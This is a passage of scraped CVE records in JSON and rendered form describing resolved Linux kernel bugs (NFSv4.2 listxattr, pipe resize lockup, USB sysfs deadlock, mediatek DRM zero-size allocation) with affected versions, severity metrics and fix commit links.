"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102\n\nA call to listxattr() with a buffer size = 0 returns the actual\nsize of the buffer needed for a subsequent call. When size \u003e 0,\nnfs4_listxattr() does not return an error because either\ngeneric_listxattr() or nfs4_listxattr_nfs4_label() consumes\nexactly all the bytes then size is 0 when calling\nnfs4_listxattr_nfs4_user() which then triggers the following\nkernel BUG:\n\n [ 99.403778] kernel BUG at mm/usercopy.c:102!\n [ 99.404063] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n [ 99.408463] CPU: 0 PID: 3310 Comm: python3 Not tainted 6.6.0-61.fc40.aarch64 #1\n [ 99.415827] Call trace:\n [ 99.415985] usercopy_abort+0x70/0xa0\n [ 99.416227] __check_heap_object+0x134/0x158\n [ 99.416505] check_heap_object+0x150/0x188\n [ 99.416696] __check_object_size.part.0+0x78/0x168\n [ 99.416886] __check_object_size+0x28/0x40\n [ 99.417078] listxattr+0x8c/0x120\n [ 99.417252] path_listxattr+0x78/0xe0\n [ 99.417476] __arm64_sys_listxattr+0x28/0x40\n [ 99.417723] invoke_syscall+0x78/0x100\n [ 99.417929] el0_svc_common.constprop.0+0x48/0xf0\n [ 99.418186] do_el0_svc+0x24/0x38\n [ 99.418376] el0_svc+0x3c/0x110\n [ 99.418554] el0t_64_sync_handler+0x120/0x130\n [ 99.418788] el0t_64_sync+0x194/0x198\n [ 99.418994] Code: aa0003e3 d000a3e0 91310000 97f49bdb (d4210000)\n\nIssue is reproduced when generic_listxattr() returns \u0027system.nfs4_acl\u0027,\nthus calling lisxattr() with size = 16 will trigger the bug.\n\nAdd check on nfs4_listxattr() to return ERANGE error when it is\ncalled with size \u003e 0 and the return value is greater than size."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:29.764Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4403438eaca6e91f02d272211c4d6b045092396b"
},
{
"url": "https://git.kernel.org/stable/c/9d52865ff28245fc2134da9f99baff603a24407a"
},
{
"url": "https://git.kernel.org/stable/c/06e828b3f1b206de08ef520fc46a40b22e1869cb"
},
{
"url": "https://git.kernel.org/stable/c/79cdcc765969d23f4e3d6ea115660c3333498768"
},
{
"url": "https://git.kernel.org/stable/c/80365c9f96015bbf048fdd6c8705d3f8770132bf"
},
{
"url": "https://git.kernel.org/stable/c/23bfecb4d852751d5e403557dd500bb563313baf"
},
{
"url": "https://git.kernel.org/stable/c/251a658bbfceafb4d58c76b77682c8bf7bcfad65"
}
],
"title": "NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26870",
"datePublished": "2024-04-17T10:27:30.756Z",
"dateReserved": "2024-02-19T14:20:24.184Z",
"dateUpdated": "2025-05-04T08:58:29.764Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52672 (GCVE-0-2023-52672)
Vulnerability from cvelistv5
Published
2024-05-17 14:02
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pipe: wakeup wr_wait after setting max_usage
Commit c73be61cede5 ("pipe: Add general notification queue support") a
regression was introduced that would lock up resized pipes under certain
conditions. See the reproducer in [1].
The commit resizing the pipe ring size was moved to a different
function, doing that moved the wakeup for pipe->wr_wait before actually
raising pipe->max_usage. If a pipe was full before the resize occured it
would result in the wakeup never actually triggering pipe_write.
Set @max_usage and @nr_accounted before waking writers if this isn't a
watch queue.
[Christian Brauner <brauner@kernel.org>: rewrite to account for watch queues]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c73be61cede5882f9605a852414db559c0ebedfd Version: c73be61cede5882f9605a852414db559c0ebedfd Version: c73be61cede5882f9605a852414db559c0ebedfd Version: c73be61cede5882f9605a852414db559c0ebedfd Version: c73be61cede5882f9605a852414db559c0ebedfd Version: c73be61cede5882f9605a852414db559c0ebedfd |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "162ae0e78bda",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3efbd114b915",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b87a1229d866",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "68e51bdb1194",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6fb70694f8d1",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e95aada4cb93",
"status": "affected",
"version": "c73be61cede5",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.8"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.210",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.149",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.76",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.15",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52672",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-18T16:59:59.118362Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400 Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-18T18:06:58.324Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.017Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/162ae0e78bdabf84ef10c1293c4ed7865cb7d3c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3efbd114b91525bb095b8ae046382197d92126b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b87a1229d8668fbc78ebd9ca0fc797a76001c60f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68e51bdb1194f11d3452525b99c98aff6f837b24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fb70694f8d1ac34e45246b0ac988f025e1e5b55"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e95aada4cb93d42e25c30a0ef9eb2923d9711d4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/pipe.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "162ae0e78bdabf84ef10c1293c4ed7865cb7d3c8",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
},
{
"lessThan": "3efbd114b91525bb095b8ae046382197d92126b9",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
},
{
"lessThan": "b87a1229d8668fbc78ebd9ca0fc797a76001c60f",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
},
{
"lessThan": "68e51bdb1194f11d3452525b99c98aff6f837b24",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
},
{
"lessThan": "6fb70694f8d1ac34e45246b0ac988f025e1e5b55",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
},
{
"lessThan": "e95aada4cb93d42e25c30a0ef9eb2923d9711d4a",
"status": "affected",
"version": "c73be61cede5882f9605a852414db559c0ebedfd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/pipe.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npipe: wakeup wr_wait after setting max_usage\n\nCommit c73be61cede5 (\"pipe: Add general notification queue support\") a\nregression was introduced that would lock up resized pipes under certain\nconditions. See the reproducer in [1].\n\nThe commit resizing the pipe ring size was moved to a different\nfunction, doing that moved the wakeup for pipe-\u003ewr_wait before actually\nraising pipe-\u003emax_usage. If a pipe was full before the resize occured it\nwould result in the wakeup never actually triggering pipe_write.\n\nSet @max_usage and @nr_accounted before waking writers if this isn\u0027t a\nwatch queue.\n\n[Christian Brauner \u003cbrauner@kernel.org\u003e: rewrite to account for watch queues]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:16.156Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/162ae0e78bdabf84ef10c1293c4ed7865cb7d3c8"
},
{
"url": "https://git.kernel.org/stable/c/3efbd114b91525bb095b8ae046382197d92126b9"
},
{
"url": "https://git.kernel.org/stable/c/b87a1229d8668fbc78ebd9ca0fc797a76001c60f"
},
{
"url": "https://git.kernel.org/stable/c/68e51bdb1194f11d3452525b99c98aff6f837b24"
},
{
"url": "https://git.kernel.org/stable/c/6fb70694f8d1ac34e45246b0ac988f025e1e5b55"
},
{
"url": "https://git.kernel.org/stable/c/e95aada4cb93d42e25c30a0ef9eb2923d9711d4a"
}
],
"title": "pipe: wakeup wr_wait after setting max_usage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52672",
"datePublished": "2024-05-17T14:02:10.308Z",
"dateReserved": "2024-03-07T14:49:46.886Z",
"dateUpdated": "2025-05-04T07:41:16.156Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26934 (GCVE-0-2024-26934)
Vulnerability from cvelistv5
Published
2024-05-01 05:17
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
USB: core: Fix deadlock in usb_deauthorize_interface()
Among the attribute file callback routines in
drivers/usb/core/sysfs.c, the interface_authorized_store() function is
the only one which acquires a device lock on an ancestor device: It
calls usb_deauthorize_interface(), which locks the interface's parent
USB device.
The will lead to deadlock if another process already owns that lock
and tries to remove the interface, whether through a configuration
change or because the device has been disconnected. As part of the
removal procedure, device_del() waits for all ongoing sysfs attribute
callbacks to complete. But usb_deauthorize_interface() can't complete
until the device lock has been released, and the lock won't be
released until the removal has finished.
The mechanism provided by sysfs to prevent this kind of deadlock is
to use the sysfs_break_active_protection() function, which tells sysfs
not to wait for the attribute callback.
Reported-and-tested by: Yue Sun <samsun1006219@gmail.com>
Reported by: xingwei lee <xrivendell7@gmail.com>
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 Version: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26934",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-10T18:35:35.947702Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:30.301Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.693Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8cbdd324b41528994027128207fae8100dff094f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12d6a5681a0a5cecc2af7860f0a1613fa7c6e947"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e451709573f8be904a8a72d0775bf114d7c291d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b175bc579f46520b11ecda443bcd2ee4904f66a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab062fa3dc69aea88fe62162c5881ba14b50ecc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/122a06f1068bf5e39089863f4f60b1f5d4273384"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbdf66250d2d33e8b27352fcb901de79f3521057"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07acf979da33c721357ff27129edf74c23c036c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80ba43e9f799cbdd83842fc27db667289b3150f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/core/sysfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8cbdd324b41528994027128207fae8100dff094f",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "12d6a5681a0a5cecc2af7860f0a1613fa7c6e947",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "e451709573f8be904a8a72d0775bf114d7c291d9",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "1b175bc579f46520b11ecda443bcd2ee4904f66a",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "ab062fa3dc69aea88fe62162c5881ba14b50ecc5",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "122a06f1068bf5e39089863f4f60b1f5d4273384",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "dbdf66250d2d33e8b27352fcb901de79f3521057",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "07acf979da33c721357ff27129edf74c23c036c6",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
},
{
"lessThan": "80ba43e9f799cbdd83842fc27db667289b3150f5",
"status": "affected",
"version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/core/sysfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.4"
},
{
"lessThan": "4.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: core: Fix deadlock in usb_deauthorize_interface()\n\nAmong the attribute file callback routines in\ndrivers/usb/core/sysfs.c, the interface_authorized_store() function is\nthe only one which acquires a device lock on an ancestor device: It\ncalls usb_deauthorize_interface(), which locks the interface\u0027s parent\nUSB device.\n\nThe will lead to deadlock if another process already owns that lock\nand tries to remove the interface, whether through a configuration\nchange or because the device has been disconnected. As part of the\nremoval procedure, device_del() waits for all ongoing sysfs attribute\ncallbacks to complete. But usb_deauthorize_interface() can\u0027t complete\nuntil the device lock has been released, and the lock won\u0027t be\nreleased until the removal has finished.\n\nThe mechanism provided by sysfs to prevent this kind of deadlock is\nto use the sysfs_break_active_protection() function, which tells sysfs\nnot to wait for the attribute callback.\n\nReported-and-tested by: Yue Sun \u003csamsun1006219@gmail.com\u003e\nReported by: xingwei lee \u003cxrivendell7@gmail.com\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:06.704Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8cbdd324b41528994027128207fae8100dff094f"
},
{
"url": "https://git.kernel.org/stable/c/12d6a5681a0a5cecc2af7860f0a1613fa7c6e947"
},
{
"url": "https://git.kernel.org/stable/c/e451709573f8be904a8a72d0775bf114d7c291d9"
},
{
"url": "https://git.kernel.org/stable/c/1b175bc579f46520b11ecda443bcd2ee4904f66a"
},
{
"url": "https://git.kernel.org/stable/c/ab062fa3dc69aea88fe62162c5881ba14b50ecc5"
},
{
"url": "https://git.kernel.org/stable/c/122a06f1068bf5e39089863f4f60b1f5d4273384"
},
{
"url": "https://git.kernel.org/stable/c/dbdf66250d2d33e8b27352fcb901de79f3521057"
},
{
"url": "https://git.kernel.org/stable/c/07acf979da33c721357ff27129edf74c23c036c6"
},
{
"url": "https://git.kernel.org/stable/c/80ba43e9f799cbdd83842fc27db667289b3150f5"
}
],
"title": "USB: core: Fix deadlock in usb_deauthorize_interface()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26934",
"datePublished": "2024-05-01T05:17:27.352Z",
"dateReserved": "2024-02-19T14:20:24.196Z",
"dateUpdated": "2025-05-04T09:00:06.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38549 (GCVE-0-2024-38549)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/mediatek: Add 0 size check to mtk_drm_gem_obj
Add a check to mtk_drm_gem_init if we attempt to allocate a GEM object
of 0 bytes. Currently, no such check exists and the kernel will panic if
a userspace application attempts to allocate a 0x0 GBM buffer.
Tested by attempting to allocate a 0x0 GBM buffer on an MT8188 and
verifying that we now return EINVAL.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:22.970Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79078880795478d551a05acc41f957700030d364"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be34a1b351ea7faeb15dde8c44fe89de3980ae67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d17b75ee9c2e44d3a3682c4ea5ab713ea6073350"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e3b6f9123726858cac299e1654e3d20424cabe4"
},
{
"tags": [
